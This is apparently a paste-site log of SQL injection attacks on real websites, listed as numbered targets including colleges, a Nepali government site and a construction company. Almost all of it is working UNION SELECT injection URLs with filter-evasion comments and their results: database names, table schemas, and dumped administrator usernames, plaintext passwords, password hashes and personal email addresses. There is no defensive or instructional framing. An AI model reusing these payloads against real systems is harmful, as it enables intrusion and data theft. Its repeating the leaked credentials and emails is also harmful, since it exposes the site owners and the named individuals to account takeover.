- http://www.nwu.edu.bd/news_details.php?id=15%27 +/*!50000UNION*/+ALL+SELECT+user(),2 --+
- --> nwuedu_root@localhost
- version --> 5.5.51-38.2
- http://www.nwu.edu.bd/news_details.php?id=15%27 +/*!50000UNION*/+ALL+SELECT+database(),2 --+
- --> nwuedu_web
- http://www.nwu.edu.bd/news_details.php?id=15%27 +/*!50000UNION*/+ALL+SELECT+ /*!12345group_ConcAt(table_name,0x3c62723e)*/,2 /*!50000from+*/information_schema.tables where table_schema = database() --+
- --> breaking_news
- ,contact
- ,content
- ,download
- ,news_events
- ,notice_board
- ,passed_student
- target 28:
- http://www.aayojan.edu.in/pune/events_detail.php?id=-5 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10--+
- --> 2,8
- http://www.aayojan.edu.in/pune/events_detail.php?id=-5 +UNION+ALL+SELECT+1,group_concat(database(),user(),version()),3,4,5,6,7,8,9,10--+
- --> aayojanpune14
- aayojan14@breakside.dreamhost.com
- 5.6.34-log
- http://www.aayojan.edu.in/pune/events_detail.php?id=-5 +UNION+ALL+SELECT+1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema = database()--+
- -->admin_login,assign_panel_menus,assign_panels,manage_user,tbl_addmission,tbl_architecture,tbl_category,tbl_category_work,tbl_contact_us,tbl_content_pages,tbl_course,tbl_events,tbl_homebanner,tbl_largebanner,tbl_links,tbl_news,tbl_notification,tbl_registration,tbl_workdetail,tblcountries
- http://www.aayojan.edu.in/pune/events_detail.php?id=-5 +UNION+ALL+SELECT+1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name= 'admin_login'--+
- -->adminId,username,password,email
- http://www.aayojan.edu.in/pune/events_detail.php?id=-5 +UNION+ALL+SELECT+1,unhex(hex(group_concat(username,' : ', password,' : ', email))),3,4,5,6,7,8,9,10 from admin_login--+
- --> AyojanCMS : AA@13Pune : info@aayojan.edu.in
- Target 29:
- http://www.medep.org.np/index.php?page=page&id=-1 +UNION+ALL+SELECT+1,2,3,4,5,user()--+
- -->medeporg_medep@localhost
- version()--> 5.5.48-cll
- db -->medeporg_medep
- Target 30:
- http://www.avcoe.org/page.php?id=-15 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--+
- --> 5
- http://www.avcoe.org/page.php?id=-15 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,/*!50000group_conCAT(version(),0x3c62723e,database(),0x3c62723e,user())*/,6,7,8,9,10,11,12,13--+
- --> 5.5.51-38.2
- avssv_aeng
- avssv_aeng@localhost
- http://www.avcoe.org/page.php?id=-15 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,/*!50000group_conCAT(table_name,0x3c62723e)*/,6,7,8,9,10,11,12,13 /*!50000from+*/information_schema.tables where table_Schema = database()--+
- --> amt_alumni
- ,amt_alumnimeet
- ,amt_banner
- ,amt_blog
- ,amt_dept
- ,amt_deptov
- ,amt_download
- ,amt_email
- ,amt_events
- ,amt_footerlogo
- ,amt_footertext
- ,amt_gallery
- ,amt_logo
- ,amt_menu
- ,amt_page
- ,amt_plinks
- ,amt_quicklinks
- ,amt_recimg
- ,amt_recruiter
- ,amt_slide
- ,amt_slider
- ,amt_smenu
- ,amt_socialicon
- ,amt_uploadimg
- ,amt_webnm
- ,rss_login
- ,test
- http://www.avcoe.org/page.php?id=-15 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,/*!50000group_conCAT(column_name,0x3c62723e)*/,6,7,8,9,10,11,12,13 /*!50000from+*/information_schema.columns where table_name= 'rss_login'--+
- --> u_id
- ,u_date
- ,u_name
- ,u_pwd
- ,u_role
- ,u_block
- ,u_purpose
- ,u_pages
- http://www.avcoe.org/page.php?id=-15 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,/*!50000group_conCAT(u_name,' : ',u_pwd,0x3c62723e)*/,6,7,8,9,10,11,12,13 /*!50000from+*/ rss_login--+
- --> EngAdmin : b512aeaa378b7365c54ee7bb6de633d0
- ,sinhaamol@yahoo.com : b2900d0f43934c5a935775b3198feed1
- ,sachin.thanekar@yahoo.co.in : sachin@123
- ,Shailesh1986 : e0fc28d1eafc198924824175bcc8e114
- ,avinashtambe : a1bc6f8c372affb323bf04e37a7310ae
- ,aemba : 2471e6c96d191bda48421a0bdd1a3f96
- ,gadakh_vijay : 1b3b293dd7a3b09b32f071b6d7c25a1b
- ,avcoeelectrical : 7e69238d375fd6d04b002c9a5f0bde67
- ,Civildept : d4708487562d467e13d73098fac22623
- ,yogeshwar : 2104a6707e7d44b5376f5ad30f1b0ed4
- ,sujata.kolekar@gmail.com : 7d801e575202293d82b7f3caf0cf6cc6
- ,ashwini.ashu051192@gmail.com : 639bf7cc718bfcebd676eacd962aa077
- ,pramod23gunjal@gmail.com : bc3ba1449b7fca1795712c448ec99c97
- ,jdhananjayan@gmail.com : 661649a55c18df4e4632917edfdf422c
- ,nileshnagarkar@yahoo.com : adee5e67419f86f8a23435960e11689c
- ,mrunalfatangare@gmail.com : ce3b43bce6b415f7d3a8fae4af1fb4d7
- ,haribhau88@gmail.com : ae6cf7ae724cbe96deb83bb98bc21430
- ,kavitapagire : 70deb95e27ef5143b0fd0904c6031200
- ,prashant.pawar.in@g
- Target 31;
- http://prekonconstructions.in/gallery_view.php?id=-9 +UNION+ALL+SELECT+1,2--+
- -->1
- http://prekonconstructions.in/gallery_view.php?id=-9 +UNION+ALL+SELECT+group_concat(version(),0x3c62723e,database(),0x3c62723e,user()),2--+
- --> 5.6.35
- hypreko_prekon
- hypreko_prekon@localhost
- http://prekonconstructions.in/gallery_view.php?id=-9 +UNION+ALL+SELECT+unhex(hex(table_name)),2 from information_schema.tables where table_schema = database()--+
- banners
- bottom_content
- categorys
- contact_content
- contact_email
- gallery
- gallery_categorys
- images
- latest_projects
- news
- ongoing_projects
- pages
- photogallery
- php_admin
- tbl_ip
- http://prekonconstructions.in/gallery_view.php?id=-9 +UNION+ALL+SELECT+unhex(hex(column_name)),2 from information_schema.columns where table_name= 'php_admin'--+
- -->
- admin_id
- admin_fname
- admin_lname
- admin_password
- admin_email
- admin_cdate
- admin_status
- http://prekonconstructions.in/gallery_view.php?id=-9 +UNION+ALL+SELECT+admin_password,2 from php_admin--+
- --> vizag@123
- http://prekonconstructions.in/gallery_view.php?id=-9 +UNION+ALL+SELECT+admin_email,2 from php_admin--+
- -->admin
- Target 32
- http://www.nnl.gov.np/content.php?id=-16' +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
- --> 4,8
- http://www.nnl.gov.np/content.php?id=-16' +UNION+ALL+SELECT+1,2,3,group_concat(version(),0x20,database(),0x20,user()),5,6,7,8,9,10,11,12,13,14,15--+
- --> 5.5.52-cll nnlgov_dbase nnlgov_front@localhost
- http://www.nnl.gov.np/content.php?id=-16' +UNION+ALL+SELECT+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema = database()--+
- -->gallery,gallerydetails,rightphoto,tblbanner,tblbhuktani,tblcontacts,tbldownloadgroup,tbldownloads,tblevents,tblfaq,tblfaq_cat,tblgrantgroup,tblgrants,tbljingle,tbllinks,tblmain,tblmenu,tblnews,tblnotice,tblrti,tblrtigroup,tbluploads,tblvideo,usertable,whoiswho
- http://www.nnl.gov.np/content.php?id=-16' +UNION+ALL+SELECT+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name= 'usertable'--+
- --> userid,usern,userp
- http://www.nnl.gov.np/content.php?id=-16' +UNION+ALL+SELECT+1,2,3,group_concat(usern,0x203a,userp,0x3c62723e),5,6,7,8,9,10,11,12,13,14,15 from usertable--+
- --> admin@123 :#clv0&sRfR2k
- account :account@123#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement